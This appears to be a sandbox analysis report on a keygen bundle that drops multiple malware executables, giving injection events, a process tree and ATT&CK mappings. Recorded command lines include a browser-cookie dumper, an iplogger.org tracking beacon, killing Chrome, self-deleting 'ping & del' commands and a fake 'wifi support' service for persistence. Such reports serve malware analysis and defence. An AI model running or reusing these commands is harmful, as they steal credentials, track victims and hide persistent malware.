Token: SeSystemtimePrivilege	1124	msiexec.exe
Token: SeProfSingleProcessPrivilege	1124	msiexec.exe
Token: SeIncBasePriorityPrivilege	1124	msiexec.exe
Token: SeCreatePagefilePrivilege	1124	msiexec.exe
Token: SeCreatePermanentPrivilege	1124	msiexec.exe
Token: SeBackupPrivilege	1124	msiexec.exe
Token: SeRestorePrivilege	1124	msiexec.exe
Token: SeShutdownPrivilege	1124	msiexec.exe
Token: SeDebugPrivilege	1124	msiexec.exe
Token: SeAuditPrivilege	1124	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1124	msiexec.exe
Token: SeChangeNotifyPrivilege	1124	msiexec.exe
Token: SeRemoteShutdownPrivilege	1124	msiexec.exe
Token: SeUndockPrivilege	1124	msiexec.exe
Token: SeSyncAgentPrivilege	1124	msiexec.exe
Token: SeEnableDelegationPrivilege	1124	msiexec.exe
Token: SeManageVolumePrivilege	1124	msiexec.exe
Token: SeImpersonatePrivilege	1124	msiexec.exe
Token: SeCreateGlobalPrivilege	1124	msiexec.exe
Token: SeCreateTokenPrivilege	1124	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msiexec.exe1021C014A4C9A552.tmp

pid process

1124 msiexec.exe
2480 1021C014A4C9A552.tmp

pid	process
1124	msiexec.exe
2480	1021C014A4C9A552.tmp

Suspicious use of SetWindowsHookEx 26 IoCs

Processes:

002.exeSetup.exesetup.exealiens.exe0B44010BDDEFEFD3.exe0B44010BDDEFEFD3.exefirefox.exe1605715653158.exefirefox.exe1605715657408.exefirefox.exe1605715663049.exefirefox.exe1605715665799.exeThunderFW.exeMiniThunderPlatform.exeMiniThunderPlatform.exe1021C014A4C9A552.exe1021C014A4C9A552.tmpseed.sfx.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeEBDD.exe

pid	process
700	002.exe
700	002.exe
3884	Setup.exe
2280	setup.exe
2944	aliens.exe
2328	0B44010BDDEFEFD3.exe
4040	0B44010BDDEFEFD3.exe
2840	firefox.exe
1396	1605715653158.exe
3276	firefox.exe
3488	1605715657408.exe
564	firefox.exe
1268	1605715663049.exe
992	firefox.exe
2860	1605715665799.exe
2552	ThunderFW.exe
3336	MiniThunderPlatform.exe
2968	MiniThunderPlatform.exe
2072	1021C014A4C9A552.exe
2480	1021C014A4C9A552.tmp
3568	seed.sfx.exe
304	MicrosoftEdge.exe
3540	MicrosoftEdgeCP.exe
3540	MicrosoftEdgeCP.exe
5040	EBDD.exe
5040	EBDD.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Treasure.Vault.3D.Screensaver.keygen.by.Paradox.execmd.exekeygen-step-3.exekeygen-pr.execmd.exekeygen-step-4.exekey.exeSetup.exesetup.exealiens.exemsiexec.exeaskinstall21.execmd.exe

description	pid	process	target process
PID 1144 wrote to memory of 1456	1144	Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe	cmd.exe
PID 1144 wrote to memory of 1456	1144	Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe	cmd.exe
PID 1144 wrote to memory of 1456	1144	Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe	cmd.exe
PID 1456 wrote to memory of 2068	1456	cmd.exe	intro.exe
PID 1456 wrote to memory of 2068	1456	cmd.exe	intro.exe
PID 1456 wrote to memory of 2068	1456	cmd.exe	intro.exe
PID 1456 wrote to memory of 1768	1456	cmd.exe	keygen-pr.exe
PID 1456 wrote to memory of 1768	1456	cmd.exe	keygen-pr.exe
PID 1456 wrote to memory of 1768	1456	cmd.exe	keygen-pr.exe
PID 1456 wrote to memory of 3132	1456	cmd.exe	keygen-step-1.exe
PID 1456 wrote to memory of 3132	1456	cmd.exe	keygen-step-1.exe
PID 1456 wrote to memory of 3132	1456	cmd.exe	keygen-step-1.exe
PID 1456 wrote to memory of 3928	1456	cmd.exe	keygen-step-3.exe
PID 1456 wrote to memory of 3928	1456	cmd.exe	keygen-step-3.exe
PID 1456 wrote to memory of 3928	1456	cmd.exe	keygen-step-3.exe
PID 3928 wrote to memory of 3040	3928	keygen-step-3.exe	cmd.exe
PID 3928 wrote to memory of 3040	3928	keygen-step-3.exe	cmd.exe
PID 3928 wrote to memory of 3040	3928	keygen-step-3.exe	cmd.exe
PID 1456 wrote to memory of 2076	1456	cmd.exe	keygen-step-4.exe
PID 1456 wrote to memory of 2076	1456	cmd.exe	keygen-step-4.exe
PID 1456 wrote to memory of 2076	1456	cmd.exe	keygen-step-4.exe
PID 1768 wrote to memory of 2064	1768	keygen-pr.exe	key.exe
PID 1768 wrote to memory of 2064	1768	keygen-pr.exe	key.exe
PID 1768 wrote to memory of 2064	1768	keygen-pr.exe	key.exe
PID 3040 wrote to memory of 2096	3040	cmd.exe	PING.EXE
PID 3040 wrote to memory of 2096	3040	cmd.exe	PING.EXE
PID 3040 wrote to memory of 2096	3040	cmd.exe	PING.EXE
PID 2076 wrote to memory of 700	2076	keygen-step-4.exe	002.exe
PID 2076 wrote to memory of 700	2076	keygen-step-4.exe	002.exe
PID 2076 wrote to memory of 700	2076	keygen-step-4.exe	002.exe
PID 2064 wrote to memory of 1572	2064	key.exe	key.exe
PID 2064 wrote to memory of 1572	2064	key.exe	key.exe
PID 2064 wrote to memory of 1572	2064	key.exe	key.exe
PID 2076 wrote to memory of 3884	2076	keygen-step-4.exe	Setup.exe
PID 2076 wrote to memory of 3884	2076	keygen-step-4.exe	Setup.exe
PID 2076 wrote to memory of 3884	2076	keygen-step-4.exe	Setup.exe
PID 3884 wrote to memory of 2280	3884	Setup.exe	setup.exe
PID 3884 wrote to memory of 2280	3884	Setup.exe	setup.exe
PID 3884 wrote to memory of 2280	3884	Setup.exe	setup.exe
PID 2280 wrote to memory of 2944	2280	setup.exe	aliens.exe
PID 2280 wrote to memory of 2944	2280	setup.exe	aliens.exe
PID 2280 wrote to memory of 2944	2280	setup.exe	aliens.exe
PID 2076 wrote to memory of 2116	2076	keygen-step-4.exe	jg2_2qua.exe
PID 2076 wrote to memory of 2116	2076	keygen-step-4.exe	jg2_2qua.exe
PID 2076 wrote to memory of 2116	2076	keygen-step-4.exe	jg2_2qua.exe
PID 2944 wrote to memory of 1124	2944	aliens.exe	msiexec.exe
PID 2944 wrote to memory of 1124	2944	aliens.exe	msiexec.exe
PID 2944 wrote to memory of 1124	2944	aliens.exe	msiexec.exe
PID 1016 wrote to memory of 2624	1016	msiexec.exe	MsiExec.exe
PID 1016 wrote to memory of 2624	1016	msiexec.exe	MsiExec.exe
PID 1016 wrote to memory of 2624	1016	msiexec.exe	MsiExec.exe
PID 2076 wrote to memory of 1272	2076	keygen-step-4.exe	askinstall21.exe
PID 2076 wrote to memory of 1272	2076	keygen-step-4.exe	askinstall21.exe
PID 2076 wrote to memory of 1272	2076	keygen-step-4.exe	askinstall21.exe
PID 2944 wrote to memory of 2328	2944	aliens.exe	0B44010BDDEFEFD3.exe
PID 2944 wrote to memory of 2328	2944	aliens.exe	0B44010BDDEFEFD3.exe
PID 2944 wrote to memory of 2328	2944	aliens.exe	0B44010BDDEFEFD3.exe
PID 1272 wrote to memory of 2156	1272	askinstall21.exe	cmd.exe
PID 1272 wrote to memory of 2156	1272	askinstall21.exe	cmd.exe
PID 1272 wrote to memory of 2156	1272	askinstall21.exe	cmd.exe
PID 2944 wrote to memory of 4040	2944	aliens.exe	0B44010BDDEFEFD3.exe
PID 2944 wrote to memory of 4040	2944	aliens.exe	0B44010BDDEFEFD3.exe
PID 2944 wrote to memory of 4040	2944	aliens.exe	0B44010BDDEFEFD3.exe
PID 2156 wrote to memory of 560	2156	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
"C:\Users\Admin\AppData\Local\Temp\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1456

C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
intro.exe 1O5ZF
3⤵
- Executes dropped EXE
PID:2068

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1768

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2064

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:1572

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:3132

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3040

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:2096

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2076

C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:700

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3884

C:\Users\Admin\AppData\Local\Temp\sib826D.tmp\0\setup.exe
"C:\Users\Admin\AppData\Local\Temp\sib826D.tmp\0\setup.exe" -s
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2280

C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe
"C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2944

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
7⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1124

C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 0011 installp1
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2328

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
8⤵
- Suspicious use of SetWindowsHookEx
PID:2840

C:\Users\Admin\AppData\Roaming\1605715653158.exe
"C:\Users\Admin\AppData\Roaming\1605715653158.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715653158.txt"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1396

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
8⤵
- Suspicious use of SetWindowsHookEx
PID:3276

C:\Users\Admin\AppData\Roaming\1605715657408.exe
"C:\Users\Admin\AppData\Roaming\1605715657408.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715657408.txt"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3488

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
8⤵
- Suspicious use of SetWindowsHookEx
PID:564

C:\Users\Admin\AppData\Roaming\1605715663049.exe
"C:\Users\Admin\AppData\Roaming\1605715663049.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715663049.txt"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1268

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
8⤵
- Suspicious use of SetWindowsHookEx
PID:992

C:\Users\Admin\AppData\Roaming\1605715665799.exe
"C:\Users\Admin\AppData\Roaming\1605715665799.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715665799.txt"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2860

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2552

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:3336

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:2968

C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2072

C:\Users\Admin\AppData\Local\Temp\is-TQGP2.tmp\1021C014A4C9A552.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TQGP2.tmp\1021C014A4C9A552.tmp" /SL5="$90038,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2480

C:\Program Files (x86)\RearRips\seed.sfx.exe
"C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s1
10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3568

C:\Program Files (x86)\Seed Trade\Seed\seed.exe
"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
11⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2464

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/14Ahe7"
10⤵
- Checks computer location settings
PID:3352

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
8⤵
PID:912

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
9⤵
- Runs ping.exe
PID:3584

C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 200 installp1
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:4040

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
8⤵
PID:2836

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
9⤵
- Kills process with taskkill
PID:3172

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
8⤵
PID:3056

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
9⤵
- Runs ping.exe
PID:2560

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
7⤵
PID:1736

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
8⤵
- Runs ping.exe
PID:1220

C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1272

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:2156

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:560

C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2908

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:3924

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1308

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 250E69250CC581C0E4EB0CB8AD8E9B0C C
2⤵
- Loads dropped DLL
PID:2624

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:304

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1692

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3540

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4120

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4388

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4548

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4640

C:\Users\Admin\AppData\Local\Temp\D5F0.exe
C:\Users\Admin\AppData\Local\Temp\D5F0.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:4904

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\e53c72c0-0784-423a-8049-005ad90d254b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
2⤵
- Modifies file permissions
PID:412

C:\Users\Admin\AppData\Local\Temp\D814.exe
C:\Users\Admin\AppData\Local\Temp\D814.exe
1⤵
- Executes dropped EXE
PID:4924

C:\Users\Admin\AppData\Local\Temp\DCF7.exe
C:\Users\Admin\AppData\Local\Temp\DCF7.exe
1⤵
- Executes dropped EXE
PID:4952

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\llvmbdxh\
2⤵
PID:640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\clfkcbws.exe" C:\Windows\SysWOW64\llvmbdxh\
2⤵
PID:2920

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create llvmbdxh binPath= "C:\Windows\SysWOW64\llvmbdxh\clfkcbws.exe /d\"C:\Users\Admin\AppData\Local\Temp\DCF7.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:4888

C:\Users\Admin\AppData\Local\Temp\E053.exe
C:\Users\Admin\AppData\Local\Temp\E053.exe
1⤵
- Executes dropped EXE
PID:4980

C:\Users\Admin\AppData\Local\Temp\EBDD.exe
C:\Users\Admin\AppData\Local\Temp\EBDD.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5040

C:\Users\Admin\AppData\Local\Temp\F4B8.exe
C:\Users\Admin\AppData\Local\Temp\F4B8.exe
1⤵
- Executes dropped EXE
PID:4216

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Privilege Escalation

New Service

T1050

Defense Evasion

File Permissions Modification

T1222

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\RearRips\seed.sfx.exe

Download Submit
C:\Program Files (x86)\RearRips\seed.sfx.exe

Download Submit
C:\Program Files (x86)\Seed Trade\Seed\seed.exe

Download Submit
C:\Program Files (x86)\Seed Trade\Seed\seed.exe

Download Submit
C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe

Download Submit
C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe

Download Submit
C:\ProgramData\Thunder Network\DownloadLib\pub_store.dat

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1FC0448E6D3D5712272FAF5B90A70C5E

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1FC0448E6D3D5712272FAF5B90A70C5E

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

Download Submit
C:\Users\Admin\AppData\Local\1797f104-535e-4a56-83db-47c5e7d9c675\5.exe

Download Submit
C:\Users\Admin\AppData\Local\1797f104-535e-4a56-83db-47c5e7d9c675\5.exe

Download Submit
C:\Users\Admin\AppData\Local\1797f104-535e-4a56-83db-47c5e7d9c675\updatewin1.exe

Download Submit
C:\Users\Admin\AppData\Local\1797f104-535e-4a56-83db-47c5e7d9c675\updatewin1.exe

Download Submit
C:\Users\Admin\AppData\Local\1797f104-535e-4a56-83db-47c5e7d9c675\updatewin2.exe

Download Submit
C:\Users\Admin\AppData\Local\1797f104-535e-4a56-83db-47c5e7d9c675\updatewin2.exe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\B31TQABN.cookie

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\InetCookies\L0S4875T.cookie

Download Submit
C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\1105.tmp

Download Submit
C:\Users\Admin\AppData\Local\Temp\D5F0.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\D5F0.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\D5F0.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\D814.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\D814.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\DCF7.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\DCF7.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\E053.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\E053.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\EBDD.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\EBDD.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\F4B8.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\F4B8.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FC4A.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FC4A.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSIB5EE.tmp

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
MD5
c615d0bfa727f494fee9ecb3f0acf563

SHA1
6c3509ae64abc299a7afa13552c4fe430071f087

SHA256
95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

SHA512
d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\JOzWR.dat

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe

